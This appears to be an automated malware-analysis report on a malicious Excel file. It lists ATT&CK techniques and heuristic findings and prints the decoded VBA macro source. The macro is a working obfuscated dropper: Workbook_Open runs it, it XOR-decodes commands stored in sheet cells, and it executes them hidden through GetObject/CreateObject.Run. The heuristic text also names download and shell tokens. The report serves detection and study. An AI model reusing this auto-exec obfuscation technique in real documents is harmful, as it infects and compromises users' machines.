Verdict: MALICIOUS
Risk Score: 148

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1203 Exploitation for Client Execution

The sample contains VBA macros, including a Workbook_Open subroutine, which is a common technique for executing malicious code upon opening an Office document. The high-severity heuristics indicate the use of CreateObject and GetObject, suggesting the macro attempts to instantiate and run external objects. The Workbook_Open macro is designed to execute a command that likely downloads and runs a secondary payload.

Heuristics (5)

- VBA macros detected (medium, 4 related findings), OLE_VBA_MACROS: Document contains VBA macro code
- CreateObject call (high), OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
  `GetObject(Evans).CreateObject(DeemeD).Run Broadcasting & " " & InteractIons, 0`
- GetObject call (high), OLE_VBA_GETOBJ: GetObject call. Matched line in script:
  `GetObject(Evans).CreateObject(DeemeD).Run Broadcasting & " " & InteractIons, 0`
- VBA p-code auto-exec with execution tokens (high), OLE_VBA_PCODE_AUTOEXEC_EXEC: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro (low), OLE_VBA_WBOPEN: Workbook_Open macro. Matched line in script:
  `Sub Workbook_Open()`

Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4770 bytes |

SHA-256: 8ac0a1f72a4eecaa4dc991cf435f8cc5dc05f21eb0799e0eb9d9cd0f229c197d

Script preview (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Losing As String
Private CorrespondenCe As String
Private Weekends As String
Private Corps As String
Private Sub EvaluatEd()
Dim Evans As String, InteractIons As Variant, Broadcasting As String, DeemeD As String
GoTo InteractIons
Comply:
Evans = DilDos(Losing): InteractIons = DilDos(CorrespondenCe): Broadcasting = DilDos(Weekends): DeemeD = DilDos(Corps)
GoTo Locked
InteractIons:
Losing = Sheets("ce94").Range("H142").Value: CorrespondenCe = Sheets("ce94").Range("E196").Value: Weekends = Sheets("ce94").Range("E106").Value: Corps = Sheets("ce94").Range("J127").Value
GoTo Comply
Locked:
GetObject(Evans).CreateObject(DeemeD).Run Broadcasting & " " & InteractIons, 0
End Sub
Sub Workbook_Open()
GoTo Hiking
Dim Hospitality As String
Hospitality = InputBox("Calculated value")
MsgBox Hospitality
Hiking:
If Hospitality = "" Then
EvaluatEd
End If
End Sub
Private Function DilDos(ByVal Walked As String) As Variant
Dim SwitcheS As Long: SwitcheS = 0: Dim Panels() As Byte: Dim SoutheaSt() As Byte, IntensIve As String, Legacy As Integer
SoutheaSt = "t1e928eaae"
GoTo NormaN
Cheat:
Dim Pleasant As String
Pleasant = InputBox("Calculate value")
CamCorders:
If SwitcheS < UBound(Panels) Then
Legacy = SwitcheS Mod (10)
GoTo Evans
InteractIons:
IntensIve = IntensIve & Chr(Panels(SwitcheS))
SwitcheS = SwitcheS + 1
GoTo CamCorders
Else
GoTo Scanner
End If
DiamonDs:
MsgBox "error -34556"
Dim Hospitality As String
Hospitality = InputBox("error report")
MsgBox Hospitality
Scanner:
DilDos = IntensIve
Exit Function
NormaN:
Panels = Portrait(Walked)
GoTo CamCorders
Evans:
Panels(SwitcheS) = Abs(Panels(SwitcheS) Xor SoutheaSt(Legacy * 2))
GoTo InteractIons
End Function
Private Function Portrait(ByVal DiamonDs As String) As Variant
Dim IntensIve() As Byte, i As Long, Legacy As Integer
i = 0: ReDim IntensIve(0 To (Len(DiamonDs) / 2)) As Byte
Hospitality:
If i < Len(DiamonDs) Then
Legacy = Legacy + 1
IntensIve(Legacy - 1) = Chr(14 + ((8 + 4) * 2)) & "H" & Mid(DiamonDs, i + (59 - 50 - 8), 2)
i = i + 2
GoTo Hospitality
Else
GoTo Pleasant
End If
Pleasant:
Portrait = IntensIve
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```